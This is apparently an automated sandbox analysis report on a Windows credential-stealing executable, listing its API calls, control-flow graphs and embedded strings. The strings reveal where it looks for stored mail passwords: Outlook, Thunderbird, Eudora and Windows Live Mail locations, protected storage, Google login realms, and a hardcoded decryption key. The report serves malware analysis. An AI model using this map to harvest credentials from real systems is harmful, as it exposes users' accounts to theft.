34011->34010 34020 410add RegQueryValueExA 34011->34020 34013 4445c1 34013->34010 34021 444879 30 API calls 34013->34021 34015 4445da 34015->34010 34016->33846 34017->33844 34018->34007 34019->34011 34020->34013 34021->34015 34022->33867 34024 4075c9 34023->34024 34025 4075bb _mbscat 34023->34025 34026 444212 34024->34026 34025->34024 34043 407e9d 34026->34043 34029 44424d 34030 444274 34029->34030 34031 444258 34029->34031 34051 407ef8 34029->34051 34032 407e9d 9 API calls 34030->34032 34064 444196 52 API calls 34031->34064 34039 4442a0 34032->34039 34034 407ef8 9 API calls 34034->34039 34035 4442ce 34061 407f90 34035->34061 34039->34034 34039->34035 34041 444212 65 API calls 34039->34041 34065 407e62 strcmp strcmp 34039->34065 34040 407f90 FindClose 34042 4442e4 34040->34042 34041->34039 34042->33889 34044 407f90 FindClose 34043->34044 34045 407eaa 34044->34045 34046 406f06 2 API calls 34045->34046 34047 407ebd strlen strlen 34046->34047 34048 407ee1 34047->34048 34049 407eea 34047->34049 34066 4070e3 strlen _mbscat _mbscpy _mbscat 34048->34066 34049->34029 34052 407f03 FindFirstFileA 34051->34052 34053 407f24 FindNextFileA 34051->34053 34054 407f3f 34052->34054 34055 407f46 strlen strlen 34053->34055 34056 407f3a 34053->34056 34054->34055 34058 407f7f 34054->34058 34055->34058 34059 407f76 34055->34059 34057 407f90 FindClose 34056->34057 34057->34054 34058->34029 34067 4070e3 strlen _mbscat _mbscpy _mbscat 34059->34067 34062 407fa3 34061->34062 34063 407f99 FindClose 34061->34063 34062->34040 34063->34062 34064->34029 34065->34039 34066->34049 34067->34058 34068->33491 34069->33495 34070->33502 34071->33501 34072->33508 34073->33505 34074->33500 34419 43ffc8 18 API calls 34233 4281cc 15 API calls __fprintf_l 34421 4383cc 110 API calls __fprintf_l 34234 4275d3 41 API calls 34422 4153d3 22 API calls __fprintf_l 34235 444dd7 _XcptFilter 34427 4013de 15 API calls 34429 425115 111 API calls __fprintf_l 34430 43f7db 18 API calls 34433 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34237 4335ee 16 API calls __fprintf_l 34435 429fef 11 API calls 34238 444deb _exit _c_exit 34436 40bbf0 138 API calls 34241 425115 79 API calls __fprintf_l 34440 437ffa 22 API calls 34245 4021ff 14 API calls 34246 43f5fc 149 API calls 34441 40e381 9 API calls 34248 405983 40 API calls 34249 42b186 27 API calls __fprintf_l 34250 427d86 76 API calls 34251 403585 20 API calls 34253 42e58e 18 API calls __fprintf_l 34256 425115 75 API calls __fprintf_l 34258 401592 8 API calls 33158 410b92 33161 410a6b 33158->33161 33160 410bb2 33162 410a77 33161->33162 33163 410a89 GetPrivateProfileIntA 33161->33163 33166 410983 memset _itoa WritePrivateProfileStringA 33162->33166 33163->33160 33165 410a84 33165->33160 33166->33165 34445 434395 16 API calls 34260 441d9c memcmp 34447 43f79b 119 API calls 34261 40c599 43 API calls 34448 426741 87 API calls 34265 4401a6 21 API calls 34267 426da6 memcpy memset memset memcpy 34268 4335a5 15 API calls 34270 4299ab memset memset memcpy memset memset 34271 40b1ab 8 API calls 34453 425115 76 API calls __fprintf_l 34457 4113b2 18 API calls 2 library calls 34461 40a3b8 memset sprintf SendMessageA 34075 410bbc 34078 4109cf 34075->34078 34079 4109dc 34078->34079 34080 410a23 memset GetPrivateProfileStringA 34079->34080 34081 4109ea memset 34079->34081 34086 407646 strlen 34080->34086 34091 4075cd sprintf memcpy 34081->34091 34084 410a65 34085 410a0c WritePrivateProfileStringA 34085->34084 34087 40765a 34086->34087 34088 40765c 34086->34088 34087->34084 34090 4076a3 34088->34090 34092 40737c strtoul 34088->34092 34090->34084 34091->34085 34092->34088 34273 40b5bf memset memset _mbsicmp

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                      APIs
                                                      • memset.MSVCRT ref: 0040832F
                                                      • memset.MSVCRT ref: 00408343
                                                      • memset.MSVCRT ref: 0040835F
                                                      • memset.MSVCRT ref: 00408376
                                                      • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                      • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                      • strlen.MSVCRT ref: 004083E9
                                                      • strlen.MSVCRT ref: 004083F8
                                                      • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                      • String ID: 5$H$O$b$i$}$}
                                                      • API String ID: 1832431107-3760989150
                                                      • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                      • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                      • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                                      • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                      APIs
                                                      • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                      • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                      • strlen.MSVCRT ref: 00407F5C
                                                      • strlen.MSVCRT ref: 00407F64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: FileFindstrlen$FirstNext
                                                      • String ID: ACD
                                                      • API String ID: 379999529-620537770
                                                      • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                      • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                      • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                                      • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 00401E8B
                                                      • strlen.MSVCRT ref: 00401EA4
                                                      • strlen.MSVCRT ref: 00401EB2
                                                      • strlen.MSVCRT ref: 00401EF8
                                                      • strlen.MSVCRT ref: 00401F06
                                                      • memset.MSVCRT ref: 00401FB1
                                                      • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                                      • memset.MSVCRT ref: 00402003
                                                      • sprintf.MSVCRT ref: 00402030
                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                      • memset.MSVCRT ref: 00402086
                                                      • memset.MSVCRT ref: 0040209B
                                                      • strlen.MSVCRT ref: 004020A1
                                                      • strlen.MSVCRT ref: 004020AF
                                                      • strlen.MSVCRT ref: 004020E2
                                                      • strlen.MSVCRT ref: 004020F0
                                                      • memset.MSVCRT ref: 00402018
                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                      • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                      • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                                      • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                      • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                      • API String ID: 1846531875-4223776976
                                                      • Opcode ID: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                      • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                      • Opcode Fuzzy Hash: 1d5c9e5188f6b082a2305a72209a31590191ad01f9a44e6bfeac10cb5ccfbbc2
                                                      • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll,75570A60,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404AB8
                                                        • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                        • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,0040CF60,75570A60), ref: 00404ADE
                                                        • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                      • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                      • DeleteObject.GDI32(?), ref: 0040D1A6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                      • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                      • API String ID: 745651260-375988210
                                                      • Opcode ID: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                      • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                      • Opcode Fuzzy Hash: 66dab05e126b40913f404dced1d7a1b7c9917f067a9e41187f19818bfede1135
                                                      • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00410825,?,?,?,?,?,?,004041C4), ref: 004107FD
                                                      • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                      • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                      • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                      Strings
                                                      • PStoreCreateInstance, xrefs: 00403C44
                                                      • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                      • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                      • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                      • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                      • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                      • pstorec.dll, xrefs: 00403C30
                                                      • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                      • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                      • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                      • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                      • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressFreeLoadProc_mbscpy
                                                      • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                      • API String ID: 1197458902-317895162
                                                      • Opcode ID: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                      • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                      • Opcode Fuzzy Hash: ad300f429030269d79da7f29e18846d437bf74986d1cc708d4c29655c4209bd3
                                                      • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 231 44b49f-44b4b0 call 444e38 GetModuleHandleA 235 444c87-444d00 __set_app_type __p__fmode __p__commode call 444e34 231->235 236 444c68-444c73 231->236 242 444d02-444d0d __setusermatherr 235->242 243 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 235->243 236->235 237 444c75-444c85 236->237 237->235 242->243 246 444d6a-444d72 243->246 247 444d74-444d76 246->247 248 444d78-444d7b 246->248 247->246 247->248 249 444d81-444d85 248->249 250 444d7d-444d7e 248->250 251 444d87-444d89 249->251 252 444d8b-444dc6 GetStartupInfoA GetModuleHandleA call 40cf44 249->252 250->249 251->250 251->252 257 444dcf-444e0f _cexit call 444e71 252->257 258 444dc8-444dc9 exit 252->258 258->257
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                      • String ID: h4ND$kGu
                                                      • API String ID: 3662548030-565523899
                                                      • Opcode ID: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                      • Instruction ID: 35bbd85eb0bb2ce5e1f1b9c4bc8677619723fc104b62ea38f54f9f601267cc63
                                                      • Opcode Fuzzy Hash: 2fd2f5ec857dcc0751115c7934250d8e7778a8a50373ba8a776a572aa6a6b888
                                                      • Instruction Fuzzy Hash: D941D3B5C023449FEB619FA4DC847AD7BB4FB49325B28412BE451A32A1D7788D41CB5C

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 262 40fb00-40fb35 call 44b090 RegOpenKeyExA 265 40fc37-40fc3d 262->265 266 40fb3b-40fb4f RegOpenKeyExA 262->266 267 40fb55-40fb7e RegQueryValueExA 266->267 268 40fc2d-40fc31 RegCloseKey 266->268 269 40fc23-40fc27 RegCloseKey 267->269 270 40fb84-40fb93 call 404734 267->270 268->265 269->268 270->269 273 40fb99-40fbd1 call 4047a5 270->273 273->269 276 40fbd3-40fbdb 273->276 277 40fc19-40fc1d LocalFree 276->277 278 40fbdd-40fc14 memcpy * 2 call 40f802 276->278 277->269 278->277
                                                      APIs
                                                      • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                                                      • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                                                      • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                      • memcpy.MSVCRT(?,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FBE4
                                                      • memcpy.MSVCRT(?,?,?), ref: 0040FBF9
                                                        • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                                                        • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                                                        • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                                                        • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                                                      • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                                                      • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                      • String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                      • API String ID: 2768085393-1693574875
                                                      • Opcode ID: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                      • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                                                      • Opcode Fuzzy Hash: 7320e33f30be2fbc30f5bd1c4a58e072b2ce45667eb80885bc3b0e2d1fc45eb5
                                                      • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A

                                                      Control-flow Graph

                                                      APIs
                                                      • memset.MSVCRT ref: 0044430B
                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                        • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                        • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                        • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                        • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                        • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                      • memset.MSVCRT ref: 00444379
                                                      • memset.MSVCRT ref: 00444394
                                                        • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                      • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                      • strlen.MSVCRT ref: 004443DB
                                                      • _strcmpi.MSVCRT ref: 00444401
                                                      Strings
                                                      • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                      • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                      • Store Root, xrefs: 004443A5
                                                      • \Microsoft\Windows Mail, xrefs: 00444329
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                      • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                      • API String ID: 832325562-2578778931
                                                      • Opcode ID: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                      • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                      • Opcode Fuzzy Hash: f06a6af35cb714c64aa9cbb6cf4603c577f85108f01cf4c992da9f1fa1720a8e
                                                      • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 301 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 306 40f5c3-40f5ea RegQueryValueExA 301->306 307 40f6d9-40f6df 301->307 308 40f6d0-40f6d3 RegCloseKey 306->308 309 40f5f0-40f5f4 306->309 308->307 309->308 310 40f5fa-40f604 309->310 311 40f606-40f618 call 40466b call 404734 310->311 312 40f677 310->312 322 40f66a-40f675 call 404785 311->322 323 40f61a-40f63e call 4047a5 311->323 313 40f67a-40f67d 312->313 313->308 315 40f67f-40f6bf call 4012ee RegQueryValueExA 313->315 315->308 321 40f6c1-40f6cf 315->321 321->308 322->313 323->322 328 40f640-40f643 323->328 329 40f661-40f664 LocalFree 328->329 330 40f645-40f65a memcpy 328->330 329->322 330->329
                                                      APIs
                                                      • memset.MSVCRT ref: 0040F567
                                                      • memset.MSVCRT ref: 0040F57F
                                                        • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                                                      • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                      • memcpy.MSVCRT(00000020,?,?,?,00000000,?,?,?,?,?,00000000), ref: 0040F652
                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                      • String ID:
                                                      • API String ID: 2012582556-3916222277
                                                      • Opcode ID: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                      • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                                                      • Opcode Fuzzy Hash: 8f617e2db47743eab2de2860531f70ca5c395556099eb0f489e65365eb291258
                                                      • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 331 4037ca-40381c memset * 2 call 444551 334 4038e2-4038e5 331->334 335 403822-403882 call 4021b6 call 406f06 * 2 strchr 331->335 342 403884-403895 _mbscpy 335->342 343 403897-4038a2 strlen 335->343 345 4038bf-4038dd _mbscpy call 4023e5 342->345 344 4038a4-4038bc sprintf 343->344 343->345 344->345 345->334
                                                      APIs
                                                      • memset.MSVCRT ref: 004037EB
                                                      • memset.MSVCRT ref: 004037FF
                                                        • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                                                        • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001,00000104,?,?,?,?,?,00000000), ref: 00406F20
                                                      • strchr.MSVCRT ref: 0040386E
                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 0040388B
                                                      • strlen.MSVCRT ref: 00403897
                                                      • sprintf.MSVCRT ref: 004038B7
                                                      • _mbscpy.MSVCRT(?,?,?,?,?), ref: 004038CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2016734658.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000000D.00000002.2016734658.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      • Associated: 0000000D.00000002.2016734658.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_400000_lftebevgelserne.jbxd
                                                      Similarity
                                                      • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                      • String ID: %s@yahoo.com
                                                      • API String ID: 317221925-3288273942
                                                      • Opcode ID: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                      • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                                                      • Opcode Fuzzy Hash: 5a56a1554c10d755001c1ca11538bf46cd5ff9b3743cfe338c5787e90ef4e93f
                                                      • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
